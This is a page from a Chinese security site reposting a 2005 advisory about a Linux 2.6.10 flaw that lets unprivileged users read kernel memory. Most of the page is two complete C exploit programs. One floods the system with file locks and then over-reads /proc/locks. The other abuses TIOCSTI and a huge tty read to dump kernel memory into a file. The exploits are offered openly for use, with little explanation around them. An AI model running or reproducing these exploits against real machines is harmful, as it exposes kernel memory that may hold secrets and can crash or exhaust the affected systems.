首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linux Vulnerability Allows Non-Privileged Users to Read Kernel Memory
来源:www.vfocus.net 作者:Georgi 发布时间:2005-02-23  

Linux Vulnerability Allows Non-Privileged Users to Read Kernel Memory

Summary
The Linux operating system version 2.6.10 and prior contains a vulnerability that allows non-privileged users to read kernel memory. The following two exploits illustrate the issue.

Credit:
The information has been provided by Georgi Guninski.

Details
Vulnerable Systems:
* Linux version 2.6.10 and prior

Exploit #1:
/*
* copyright georgi guninski
* cannot be used in vulnerability databases like securityfocus and mitre
*
* */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/file.h>
#include <syscall.h>
#include <errno.h>

_syscall5(int, _llseek, uint, fd, ulong, hi, ulong, lo, loff_t *, res,
uint, wh)

void makefiles()
{
int cou,fv;
char vn[242];
for(cou=0;cou<920;cou++)
{
snprintf(vn,sizeof(vn),"TEMPFILEMAYBEDELETE%d.%d",getpid(),cou);
fv=open(vn,O_CREAT|O_RDWR,S_IRWXU);
if (fv <0) perror("open2");
if (flock(fv,LOCK_EX) == -1) perror("flock");

}
while(42);
}

int main(int ac, char **av)
{
int fd,fv,i,cou;
void *mv;
char *he,*he2;
loff_t lr;
char c;


printf("\n\nThis may seriously screw your box\n\n");
printf("This creates a lot of files 'TEMPFILEMAYBEDELE*' in cwd\n");
printf("Press 'Y' to run it\n");
read(0,&c,1);
if (c != 'Y') return 42;
cou=5;
printf("creating files...\n");
while(cou--)
if (!fork())
makefiles();

sleep(20);
printf("starting...\n");
system("sync");
fd=open("/proc/locks",O_RDONLY);
if (fd <0) perror("open");
he=malloc(1024*1024*8);
he2=malloc(1024*1024*8);


if (-1 == _llseek(fd,42,0x80004242,&lr,SEEK_SET)) perror("llseek");
i=read(fd,he2, 0x80004242);
perror("read");
printf("read=%d mv=%x fv=%x\n %.300s",i,(int)mv,fv,he2);
while(42);
return 42;
}

Exploit #2:
/*
* Copyright Georgi Guninski
* Cannot be used in vulnerability databases like security focus and mitre
* */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <linux/vt.h>
#include <sys/vt.h>
#include <sys/ioctl.h>
#include <string.h>
#include <unistd.h>
#include <term.h>
#include <sys/mman.h>


int main(int ac, char **av)
{
int fd,fv;
int cou=4242,i;
char *bu;
struct termios ti;
struct termios ol;
char zer[1024];

fd=open("/dev/tty",O_RDWR);
if (fd<0) {perror("open");return -42;}
memset(&ti,0,sizeof(ti));
fv=open("kmem1",O_CREAT|O_RDWR|O_TRUNC,S_IRWXU);
if (fv <0 ) perror("open2");

/* how much to read in kilobytes*/
i=40*1024;

memset(zer,0,sizeof(zer));
while(i--) write(fv,zer,sizeof(zer));

bu=mmap(0,0x80000000,PROT_READ|PROT_WRITE,MAP_SHARED,fv,0);
if (-1 == (long) bu) perror("mmap");
printf("bu=%x\n",(int)bu);
if (ioctl(fd,TCGETS,&ti) < 0) perror("TCGETS");
ol=ti;
ti.c_lflag &= (~ICANON & ~ISIG & ~ICRNL & ~IXON & ~OPOST );
if (ioctl(fd,TCSETS,&ti) < 0) perror("TCSETS");
if (!fork())
{sleep(3);ioctl(fd,TIOCSTI,&cou);exit(0);};
sleep(2);
cou=read(fd,bu,0x80000000);
printf("read=%d\n",cou);
perror("read");

if (ioctl(fd,TCSETS,&ol) < 0) perror("TCSETS");
printf("done. check 'kmem1'");
system("reset");
return 42;
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Nullsoft SHOUTcast v1.9.4 remo
·Knox Arkeia Server Backup Stac
·SHOUTcast DNAS/Linux v1.9.4 fo
·Multiple Vulnerabilities in Tr
·Arkeia Backup Client Remote Ac
·Arkeia Network Backup Client A
·Nullsoft SHOUTcast v1.9.4 remo
·Chat Anywhere Local Passwords
·Cfengine RSA Authentication Re
·eXeem Local Passwords Disclosu
·Thomson TCW690 POST Password V
·WWW File Share Pro Local Passw
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved